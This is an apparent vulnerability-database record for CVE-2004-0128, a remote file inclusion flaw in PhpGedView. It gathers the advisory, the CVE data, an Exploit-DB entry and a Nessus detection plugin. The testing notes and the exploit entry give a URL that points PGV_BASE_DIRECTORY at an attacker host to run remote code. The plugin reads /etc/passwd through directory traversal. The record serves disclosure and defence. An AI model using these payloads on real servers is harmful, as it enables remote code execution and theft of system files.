ID OSVDB:3769 Type osvdb Reporter OSVDB Modified 2004-01-29T05:36:45
Description
Vulnerability Description
PhpGedView contains a remote file inclusion flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. The flaw may allow an attacker to execute arbitrary code, resulting in a loss of confidentiality, integrity, and/or availability.
Solution Description
Upgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
PhpGedView contains a remote file inclusion flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. The flaw may allow an attacker to execute arbitrary code, resulting in a loss of confidentiality, integrity, and/or availability.
Manual Testing Notes
In this case you first have to obtain the name of the GEDCOM file in use. Perform
an http://[target]/session.php request; the GEDCOM file name will appear as an
argument of the login.php call.
{"type": "osvdb", "published": "2004-01-29T05:36:45", "href": "https://vulners.com/osvdb/OSVDB:3769", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 20, "edition": 1, "reporter": "OSVDB", "title": "PhpGedView PGV_BASE_DIRECTORY Arbitrary Command Execution", "affectedSoftware": [{"operator": "eq", "version": "2.61", "name": "PhpGedView"}, {"operator": "eq", "version": "2.65", "name": "PhpGedView"}, {"operator": "eq", "version": "2.61.1", "name": "PhpGedView"}, {"operator": "eq", "version": "2.65.1", "name": "PhpGedView"}, {"operator": "eq", "version": "2.60", "name": "PhpGedView"}], "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2017-04-28T13:19:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0128"]}, {"type": "exploitdb", "idList": ["EDB-ID:23617"]}, {"type": "nessus", "idList": ["PHPGEDVIEW_DIRECTORY_TRAVERSAL.NASL"]}], "modified": "2017-04-28T13:19:58", "rev": 2}, "vulnersScore": 7.3}, "references": [], "id": "OSVDB:3769", "lastseen": "2017-04-28T13:19:58", "cvelist": ["CVE-2004-0128"], "modified": "2004-01-29T05:36:45", "description": "## Vulnerability Description\nPhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nUpgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. 
The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.\n## Manual Testing Notes\nIn this case you have to obtain the name of the GEDCOM File used. Just perform\na http://[target]/session.php request the GEDCOM file will be in argument of the\nlogin.php call.\n\nhttp://[victim]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://[attacker]&THEME_DIR=/\n## References:\nVendor URL: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517\nVendor URL: http://phpgedview.sourceforge.net/\n[Secunia Advisory ID:10753](https://secuniaresearch.flexerasoftware.com/advisories/10753/)\n[Related OSVDB ID: 3768](https://vulners.com/osvdb/OSVDB:3768)\nOther Advisory URL: http://www.netvigilance.com/advisory0002\nOther Advisory URL: http://www.securityfocus.com/archive/1/352355\nKeyword: TC 17868\nKeyword: netVigilance Security Advisory 2\n[CVE-2004-0128](https://vulners.com/cve/CVE-2004-0128)\nBugtraq ID: 9531\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "PHP remote file inclusion vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.", "edition": 3, "cvss3": {}, "published": "2004-03-03T05:00:00", "title": "CVE-2004-0128", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0128"], "modified": "2017-10-10T01:30:00", "cpe": ["cpe:/a:phpgedview:phpgedview:2.65", "cpe:/a:phpgedview:phpgedview:2.65.1", "cpe:/a:phpgedview:phpgedview:2.52.3", "cpe:/a:phpgedview:phpgedview:2.60", "cpe:/a:phpgedview:phpgedview:2.61.1", "cpe:/a:phpgedview:phpgedview:2.61"], "id": "CVE-2004-0128", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0128", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpgedview:phpgedview:2.52.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.65:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.65.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.60:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.61:*:*:*:*:*:*:*", "cpe:2.3:a:phpgedview:phpgedview:2.61.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T21:24:28", "description": "PhpGedView 2.x [GED_File]_conf.php Remote File Include Vulnerability. CVE-2004-0128. 
Webapps exploit for php platform", "published": "2004-01-30T00:00:00", "type": "exploitdb", "title": "PhpGedView 2.x - GED_File_conf.php Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0128"], "modified": "2004-01-30T00:00:00", "id": "EDB-ID:23617", "href": "https://www.exploit-db.com/exploits/23617/", "sourceData": "source: http://www.securityfocus.com/bid/9531/info\r\n\r\nIt has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path.\r\n\r\nPhpGedView versions 2.65.1 and prior have been reported to be prone to this issue.\r\n\r\nhttp://www.example.com/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23617/"}], "nessus": [{"lastseen": "2021-01-01T04:54:57", "description": "A vulnerability exists in the installed version of PhpGedView that\nmay allow an attacker to read arbitrary files on the remote web\nserver with the privileges of the web user.\n\nAnother vulnerability could allow an attacker to include arbitrary\nPHP files hosted on a third-party website.", "edition": 23, "published": "2004-02-02T00:00:00", "title": "phpGedView Arbitrary File Access / Remote File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0128", "CVE-2004-0127"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:phpgedview:phpgedview"], "id": "PHPGEDVIEW_DIRECTORY_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/12034", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12034);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2004-0127\", \"CVE-2004-0128\");\n script_bugtraq_id(9529, 9531);\n\n script_name(english:\"phpGedView Arbitrary File Access / Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"A remote web application is affected by several flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the installed version of PhpGedView that\nmay allow an attacker to read arbitrary files on the remote web\nserver with the privileges of the web user.\n\nAnother vulnerability could allow an attacker to include arbitrary\nPHP files hosted on a third-party website.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.netvigilance.com/advisory0003\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PhpGedView 2.65.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpgedview:phpgedview\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"phpgedview_detect.nasl\");\n 
script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\", \"www/phpgedview\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE, embedded:FALSE);\n\n# Test an install.\ninstall = get_install_from_kb(appname:'phpgedview', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\n\nu = strcat(dir,\"/editconfig_gedcom.php?gedcom_config=../../../../../../../../../../etc/passwd\");\nr = http_send_recv3(method: \"GET\", item: u, port:port, exit_on_fail:TRUE);\n\nbuf = strcat(r[0], r[1], '\\r\\n', r[2]);\nif (egrep(pattern:\"root:.*:0:[01]:\", string:buf)){\n security_hole(port);\n exit(0);\n}\nelse exit(0, \"The PhpGedView install at \"+build_url(port:port, qs:dir+'/')+\" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}